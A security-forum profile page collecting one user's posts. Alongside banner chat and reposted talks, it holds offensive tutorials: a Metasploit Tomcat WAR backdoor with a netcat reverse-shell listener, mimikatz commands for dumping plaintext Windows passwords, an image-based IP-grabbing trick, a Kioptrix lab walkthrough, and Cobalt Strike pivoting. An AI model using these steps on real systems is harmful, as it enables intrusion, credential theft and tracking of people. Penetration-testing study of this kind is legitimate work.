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Everything posted by Wubi

  1. Da`i putin cu Erase Tool prin zonele negre din imaginea din dreapta, se vede copiata. Si un replace color ca sa se asorteze oarecum cu tema. Si textul ceva mai aproape de logo.
  2. Pai pune un ceva din astea in dreapta https://www.pikeresearch.com/wordpress/wp-content/uploads/2010/08/Smart-Meter-Security.jpg ; http://www.linuxuser.co.uk/wp-content/uploads/2009/11/Security-image.jpg ; http://www.trust-it.gr/userfiles/5846dbed-56ad-4d9a-8100-f2eda5438caf/net-security.jpg ; http://img.icbdr.com/images/talentnetwork//cyber-security.jpg ; http://files.myopera.com/AOTEAROAnz/blog/CyberSecurity2.gif ; cu opacitatea ceva mai scazuta cat sa ramana oarecum vizibil in dreapta.
  3. Venea mai bine pe stanga zic eu...
  4. Arata a mileu cu lant. Lasa`l fara, lasa textul si logo-ul in stanga si mai pune`i un 'ceva' in dreapta sa nu para gol si e perfect. Zic si eu.
  5. Wubi


    Esti un fel de raie!
  6. http://clinamen.jamesjbrownjr.net/wp-content/uploads/2010/11/hacker.jpg ; https://www.pikeresearch.com/wordpress/wp-content/uploads/2010/08/Smart-Meter-Security.jpg ; http://www.linuxuser.co.uk/wp-content/uploads/2009/11/Security-image.jpg ; http://www.trust-it.gr/userfiles/5846dbed-56ad-4d9a-8100-f2eda5438caf/net-security.jpg ; http://img.icbdr.com/images/talentnetwork//cyber-security.jpg ; http://files.myopera.com/AOTEAROAnz/blog/CyberSecurity2.gif ; RST-ului nu`i plac tuburile.
  7. ^ Nu.
  8. Wubi


    Giuflex faci?
  9. Wubi


    Scopul si durata vizitei?
  10. Building a Distributed Satellite Ground Station Network - A Call To Arms Hackers need satellites. Hackers need internet over satellites. Satellites require ground stations. Let's build them! As proposed by Nick Farr et al at CCCamp11, we - the hacker community - are in desperate need for our own communication infrastructure. So here we are, answering the call for the Hacker Space Program with our proposal of a distributed satellite communications ground station network. An affordable way to bring satellite communications to a hackerspace near you. We're proposing a multi-step approach to work towards this goal by setting up a distributed network of ground stations which will ensure a 24/7 communication window - first tracking, then communicating with satellites. The current state of a proof of concept implementation will be presented. This is a project closely related to the academic femto-satellite movement, ham radio, Constellation@Home. The area of small satellites (femto-satellite under 0.1 kg up to mini-satellite 100-500 kg) is currently pressed forward by Universities and enables scientific research at a small budget. Gathered data, both scientific and operational, requires communication between satellites and ground stations as well as to the final recipients of the data. One either has to establish own transmission stations or rent already existing stations. The project "distributed ground station" is an extension to the project which will offer, at its final expansion state, the ability to receive data from satellites and relay them to the final recepients. It is therefore proposed that a world-wide distributed network of antennas is to be set up which will be connected via the internet allowing the forwarding of received signals to a central server which will in turn forward signals to further recepients. Individual antennas will be set up by volunteers (Citizen Scientists) and partner institutions (Universities, institutes, companies). The core objective of the project is to develop an affordable hardware platform (antenna and receiver) to be connected to home computers as well as the required software. This platform should enable everyone to receive signals from femto-satellites at a budget and in doing so, eradicating black patches where there is currently no ground station to receive signals of satellites passing over-head. Emphasise is put on contributions by volunteers and ham radio operators who can contribute both passively by setting up a receiver station or actively by shaping the project making it a community driven effort powered by open-source hardware and applications. Purposes The distributed ground stations will enable many different uses. Using distributed ground stations one could receive beacon signals of satellites and triangulate their position and trajectory. It would therefore be possible to determine the kepler elements right after launching of a new satellite without having to rely on official reports made at low frequency. Beacon tracking is also not limited to just satellites but can be used to track other objects like weather balloons and areal drones and record their flight paths. Additionally, beacon signals (sender ID, time, transmission power) could be augmented with house-keeping data to allow troubleshooting in cases where a main data feed is interrupted. Details regarding the protocol and maximum data packet length are to be defined during the feasibility study phase. Furthermore, distributed ground stations can be used as "data dumping" receivers. This can be used to reduce load on the main ground station as well as to more quickly distribute data to final recipients. The FunCube project, an out-reach project to schools, is already using a similar approach. Another expansion stage would be increasing the bandwidth of the individual receivers. As a side-effect, distributed ground station could also be used to analyse meteorite scattering and study effects in the ionosphere by having a ground-based sender with a known beacon signal to be reflected off meteorites and/or the iononosphere and in turn received by the distributed ground stations. Depending on the frequency used further applications in the field of atmospheric research, eg. local and regional properties of the air and storm clouds, can be imagined. Depending on local laws and guidelines, antennas could also be used to transmit signals. The concept suggests the following expansion stages: Speaker: Andreas -horn- Hornig, hadez EventID: 4699 Event: 28th Chaos Communication Congress (28C3) by the Chaos Computer Club [CCC] Location: Berlin Congress Center [bcc]; Alexanderstr. 11; 10178 Berlin; Germany Language: english Start: 28.12.2011 + License: CC-by-nc-sa Sursa YouTube
  11. Windows Server 2012 is now available. It offers businesses and service providers a scalable, dynamic, and multitenant-aware cloud-optimized infrastructure. Windows Server 2012 helps organizations connect securely across premises and helps IT Professionals to respond to business needs faster and more efficiently. Windows Server powers many of the worlds' largest datacenters, enables small businesses around the world, and delivers value to organizations of all sizes in between. Windows Server 2012 redefines the server category, delivering hundreds of new features and enhancements spanning virtualization, networking, storage, user experience, cloud computing, automation, and more. Simply put, Windows Server 2012 helps you transform your IT operations to reduce costs and deliver a whole new level of business value. Download the Windows Server 2012 evaluation and learn what it can do for you today. Register for Download and Evaluation Access technical product resources—forums, solution accelerators, white papers and webcasts—at the Windows Server 2012 Resource Page. Review Windows Server 2012 system requirements Register, then download and install full-featured software for a 180-day trial Receive emails with resources to guide you [TABLE=class: multicol] [TR] [TD=class: innercol]Download the Evaluation ISO GET STARTED NOW[/TD] [TD=class: innercol][/TD] [TD]Download the Evaluation VHD GET STARTED NOW[/TD] [/TR] [/TABLE] The Windows Server 2012 evaluation software is available in Standard and Datacenter editions. You will be prompted to choose a version during the set-up and registration process. ISO available in: Chinese (Simplified), English, French, German, Italian, Japanese, Russian, Spanish. VHD available in: English Sursa Microsoft
  12. https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/383868_107056186081224_20434288_n.jpg Ceva de genu` doar ca pui rst in loc.
  13. Wubi


    Da, mi`am cumparat PWB, dar nu au legatura cu topicul asta.
  14. Ndiff is a tool that it can be used to compare two nmap scan files and highlights any changes between them.In order to compare the scans,the files in nmap must be saved in text or xml format.Ndiff will point out the differences between them for easy comparison by using plus and minus signs. Lets say that we want to compare two scans of a single host.We will use the option -oX and a filename.xml which will save the nmap outputs in a xml file. As we can see from the first scan the host has only two ports open while in the second has 5.Now lets try to compare these two results with the Ndiff.The comparison can be done very easily just by using the command ndiff [filename.xml filename2.xml] The above image illustrates the differences between these two scans that we have conducted on the same host.The plus sign (+) highlights the differences of the second file in relation with the first while the minus (-) sign indicates the differences of the first file in comparison with the second.Specifically in the example above we can see that the port 135,1111 and 3389 have the plus sign which means that in the second scan these ports were found open while in the first scan these ports were closed. Alternatively we can use the -v option (verbose mode) which it will display all the output of these two xml files and it will highlight the differences with the plus and minus signs as before. Ndiff also provides the ability to produce the results in XML output with the –xml option.This option is useful in cases where we want to import the information from Ndiff into a third party tool that uses this format. Sursa Penetration Testing Lab
  15. If we have performed a penetration test against an Apache Tomcat server and we have managed to gain access then we might want to consider to place a web backdoor in order to maintain our access.Apache Tomcat accepts .WAR file types so our backdoor must have this file extension.In case that we don’t have a WAR backdoor already in our disposal we can use Metasploit to create one very fast. The first thing that we have to do is to create the WAR file.That WAR file will carry a common metasploit payload that will connect back to us once it is executed.Our Apache Tomcat is on a Linux host so for this example we will use a linux payload. The LHOST of course is our local IP address and we have used the name pentestlab for the war file.Once we execute this command the metasploit will insert the payload on a .jsp file and it will save it as pentestlab.war.However the metasploit will use a random name for the .jsp backdoor so we need to know before we upload it the name.A quick method is to extract the pentestlab.war file in order to see the exact file name of the .jsp backdoor. The next step is to go to Apache Tomcat Manager and to upload it. Now that the backdoor has been uploaded we need to use the netcat utility and to put it on the listen mode.So we need to execute the following command: nc -l -v -p 4444 which it will listen for any incoming connection on port 4444.The backdoor that the metasploit has created by default it will use the 4444 for connections so everything now it is ready.We access the backdoor from our web browser which in this example will be in the following url: and we have a reverse shell connection with the web server. Conclusion As we saw we can use the Metasploit Framework in order to create fast a simple backdoor for our target.This can help us in a situation where we want to maintain a connection with the server and we don’t have already a WAR backdoor for deployment in our files. Sursa Penetration Testing Lab
  16. In this video i will show you how to you can get someones IP Address using an image... All you need is a place to host the files in the download below it's not a survey link.... Download the files and then upload them to a host you will need to edit the .htaccess file inside the .htaccess file you will need to change the root.jpg and me.jpg with the names of your images if your image is a png or a gif you will need to change the .jpg to the file name... Pretty simple just follow the video... Any questions leave them in the comments After you upload and edit the .htaccess file you can then embed using BB Code on some forums or use a HTML image tag or just give the whole link to where the image is and wait for the IP's to come in! Download: AdF.ly - shrink your URLs and get paid! Download is not a survey... Sursa YouTube
  17. Covert VPN creates a network interface on the Cobalt Strike system and bridges this interface into the target's network. Through a Covert VPN interface: your system may sniff traffic on your target's network, act as a rogue server, or perform man-in-the-middle attacks normally reserved for internal assessments. You may use external scanning and attack tools to assess your target network as well. VPN Pivoting - Cobalt Strike Sursa YouTube
  18. The PDFrizator is a Freeware tool to create PDF presentations, with the possibility to setup the PDF page transition effect, page advance time, and background music. This can be done for already existing PDF’s, or from the various file type formats supported, that can all be converted, and visually combined, in the same project. Key Features of PDFrizator Create PDF presentations, setting up the page transition effect, automatic page advance time and the presentation background music. Convert multiple file type formats (e.g. .gif, .jpg, .png, .tif, .cbr, .cbz,…) to PDF. Add supported file types to the project using the command line, Shell drag and drop, Internet search, or paste from the Windows clipboard. Powerful Resource Explorer, able to browse local files and online ones using Internet services such as: Bing images, Google images, Picasa, Flickr and Twitpic. Advanced Sound Explorer, with embedded player, to easily select local music files, or found in the Internet, searching in sites such as SoundCloud. Easily view and convert .cbr and .cbz Comic Books to PDF. Acquire from TWAIN sources, with timed acquire function. Auto deskew pages, even from already existing PDF’s. Visually merge, delete, rotate, rearrange and set result PDF pages size. Advanced GUI, with docking functionality. Possibility to install in portable mode. PDFrizator is not a very complicated tool and you just need to select the files you need for your presentation and get started. You might have some trouble understanding how PDFrizator works, but read on and you will fully understand how to use it. But before proceeding, please note that it does not support .DOC, .PPT, or any other MS Office format. However, it supports most major image formats and of course it supports PDF Download PDFrizator: PDFrizator – PDFrizatorSetup.zip Sursa PenTestIT
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  21. In this video I'll show you how to grab windows passwords in plain text. Download "mimikatz_trunk.zip" from "blog.gentilkiwi.com/mimikatz"; and extract it to "C:\Windows\System32" . Run cmd as Administrator. Commands: C:\Windows\System32\mimikatz_trunk\win32 . mimikatz.exe privilege::debug inject::process lsass.exe sekurlsa.dll @getLogonPasswords Sursa YouTube
  22. Overview Our target system is Kioptrix 2. Kioptrix is a "Vulnerable-By-Design OS" which serves as a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine. The video describes a step-by-step way of going about this. Steps * Discover network for hosts (Netdiscover) * Scan target network (Nmap) * Bypass login screen (MySQL Injection) * Set NetCat to listen on attack machine * Inject bash reverse shell. * Navigate to directory where apache user can write files (cd /tmp) * Search for Local privilege escalation exploit for linux kernel version 2.6 * Download exploit code and host it on attack machine * Use reverse shell to wget exploit code to Victim's machine * Compile exploit code and Execute. * Game Over Rotimi Akinyele – The Infosec Shinobi - Rotimi Akinyele (Infosec Shinobi) Sursa YouTube
  23. As we all know that the iFrame and Script are the HTML tags. But Now a days hackers are using iFrame and its internal attributes like Height Width and Frameborder more. Typically iFrame allows a developer to embed the content of one page to the another page. Calling one page's content to other page and showing there. Means A developer can call multiple page's content to show all in one page. But the cyber criminals has found the exploit this functionality in order to run their malicious code to the client side.Hackers are using more iFrames as well as the Script command to execute javascripts as well as other malicious scripts to the client side through their websites. This type of attack is also called as Drive-By Attack. This type of attack is allowing hackers to run their code invisibly as well as silently. Know More about iFrame for HTML5 - HTML5 iframe Tag Sursa YouTube
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